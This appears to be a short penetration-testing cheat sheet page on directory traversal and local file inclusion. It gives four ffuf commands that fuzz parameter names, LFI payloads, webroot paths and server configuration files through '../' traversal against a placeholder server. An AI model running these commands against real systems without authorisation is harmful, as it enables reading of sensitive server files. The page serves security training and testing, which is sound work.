Misc

miscellaneous tricks for Directory Traversal/ LFI

  • Fuzz page parameters: ffuf -w /path/to/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://server_ip:port/index.php?FUZZ=value' -fs xxx

  • Fuzz LFI payloads: ffuf -w /path/to/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://server_ip:port/index.php?path=FUZZ' -fs xxx

  • Fuzz webroot path: ffuf -w /path/to/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://server_ip:port/index.php?path=../../../../FUZZ/index.php' -fs xxx

  • Fuzz server configurations (wordlist: https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux): ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://server_ip:port/index.php?path=../../../../FUZZ' -fs xxx

PreviousRCENextPage 2

Last updated